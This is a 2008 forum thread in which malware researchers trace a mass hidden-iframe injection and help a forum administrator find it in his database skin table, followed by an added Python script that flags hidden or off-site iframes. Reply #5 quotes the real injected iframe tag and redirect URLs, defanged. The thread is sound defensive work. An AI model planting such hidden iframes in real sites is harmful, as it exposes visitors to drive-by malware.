Author Topic: cry217/xd.php - wpa.qq.com mass injection  (Read 14611 times)

June 01, 2008, 01:17:44 pm

CM_MWR

June 01, 2008, 02:15:38 pm
Reply #1

sowhat-x
First result in Google for "cry217/xd.php"...
hxxp://www.dir4you.org/cry217/xd.php

A bit more digging that CM_MWR did for this dir4you.org...

...and it seems they started much earlier...
Here's a nice thread over at Castlecops, back from mid-April:
http://www.castlecops.com/p1077867-iframe_attack_several_exploits.html

June 25, 2008, 03:25:21 am
Reply #2

sbysky
Hi, I found this post through a Google search. I'm the administrator of the site http://www.sbysky.com/bbs
Could you tell me how to clear this virus? I'd appreciate your help very much!

June 25, 2008, 03:50:15 am
Reply #3

sowhat-x
Hi sbysky,
at least from what I see, since some time has passed, your forum is... NOT infected...  :)
And we don't have it (nor ever had it) listed in the main page's malware hosts database, lol...

It's quite possible that the cry217 malware script above (hosted on the "postcardss.phpnet.us" domain),
after infecting its visitors, then redirected them to random pages in your forum,
in an attempt to obscure/confuse end-users about what had already taken place "behind" the scenes...
I'll completely remove the reference to your forum from CM_MWR's logs above though,
so that people don't get the wrong impression...  ::)

June 25, 2008, 05:21:38 am
Reply #4

sbysky
Thank you for your reply. However, this morning, when I visited the forum, there was an alarm from Kaspersky Anti-Virus, which said:

"Trojan-Downloader.JS.Agent.axm URL: hxxp://www.dir4you.org/6/testasd///www.dir4you"

I searched for the keyword "dir4you" in the directories and the MySQL database, but found no result.

The alarm doesn't appear every time you open the forum, but in some cases it does happen.

Has the code been encoded and encrypted into something else?

June 25, 2008, 06:12:24 am
Reply #5

sowhat-x
hxxp://www.dir4you.org/6/testasd///www.dir4you -> directs to...
hxxp://www.kandidatov.net/search.php?q=www&saff=4 -> which eventually leads to...
hxxp://bestsexworld.info/soft.php?aid=0073&d=3&product=XPA

bestsexworld.info was associated with the recent spreading of the rogue/fake "XPAntivirus 2008":
I say 'was', because at the moment bestsexworld.info doesn't seem to be up and running...
You can read more about it here as well:
http://msmvps.com/blogs/spywaresucks/archive/2008/03/07/1535753.aspx
========================================

You say that the alarm doesn't appear every time you visit the forum,
which can mean quite a lot of different things... and complicates stuff a bit.  :-\
You should actually manually step through your html/php code,
preferably on the pages where Kaspersky did indeed pop up the alarm...
An example 'infected' page is here:
hxxp://www.sbysky.com/bbs/index.php?showtopic=4
If you check the html source, you'll find there...
<iframe src="hxxp://www.rxpharmacyonline.net/1/js_go_f1.php"style="display:none"></iframe>
href=hxxp://wpa.qq.com/msgrd?V=1&Uin=5774044&Site=
Maybe there's more... that was a really quick look indeed,
and yes, it's the malware lamers already mentioned above...

Problem is, it's not necessarily the case that all of the infected pages
will redirect specifically to rxpharmacyonline, dir4you or wpa.qq...
and this makes the whole cleaning process somewhat troublesome.
Something really important... (unless you've "faked" the information displayed),
you seem to be running a really old IPB version there... that's really asking for serious trouble:
I would certainly consider upgrading, or alternatively, switching to a secure freeware alternative.
Even if you step through all the html pages... find all of the injected malware iframes etc.,
since 'hackers' make use of automated scanners in order to find older vulnerable forum installations,
it's more than likely that in the next mass injection your forum will become a victim once again...

The php gurus around seem to have a somewhat different timezone...
but during the day / by the time they see the posts here,
I'm sure they'll assist you in checking in more detail and cleaning up your forum...

June 25, 2008, 01:07:05 pm
Reply #6

sbysky
Thank you very much! I have found it and deleted it.
In the MySQL database, there is a table that configures the forum skin properties. The virus code had been written at its end.
I will upgrade my forum to a newer version.
Good luck to everyone!
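
A defender-side check in the spirit of the advice in Reply #5 and the finding in Reply #6 (an added example, not code from this thread or from the forum software): it parses a skin template string as it might be pulled from the database table sbysky mentions and reports every iframe that is hidden (display:none, visibility:hidden, or 1x1 size) or that points to a host other than the forum's own. The sample template, the "malicious.example" host and the "www.forum.example" own-host list are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a skin template row as it might come out of the forum's
# database, with a hidden iframe appended at its end (placeholder host).
SAMPLE_TEMPLATE = """<div id="footer">Powered by the board</div>
<iframe src="http://malicious.example/1/js_go_f1.php" style="display:none"></iframe>
<iframe src="http://www.forum.example/embed/stats.php" width="1" height="1"></iframe>
"""


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def is_hidden(attrs):
    """True when the iframe is styled or sized so that a visitor never sees it."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    try:
        return int(attrs.get("width", "100")) <= 1 and int(attrs.get("height", "100")) <= 1
    except ValueError:
        return False


def find_suspicious_iframes(html, own_hosts):
    """Return (src, reason) pairs for iframes that are hidden or point off-site."""
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""
        reasons = []
        if is_hidden(attrs):
            reasons.append("hidden")
        if host and host not in own_hosts:
            reasons.append("off-site:" + host)
        if reasons:
            hits.append((src, ", ".join(reasons)))
    return hits


def scan_template_rows(rows, own_hosts):
    """rows: iterable of (template_name, html) as fetched from the skin table."""
    report = {}
    for name, html in rows:
        hits = find_suspicious_iframes(html, own_hosts)
        if hits:
            report[name] = hits
    return report
```

Feeding the script every template row (and, for the "not every page alarms" case, each served page) gives a list to review by hand; a hit is a lead, not proof, so confirm before deleting.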

June 26, 2008, 05:56:17 am
Reply #7

sowhat-x
Glad that we've been of some help in cleaning up the forum from the nasties :)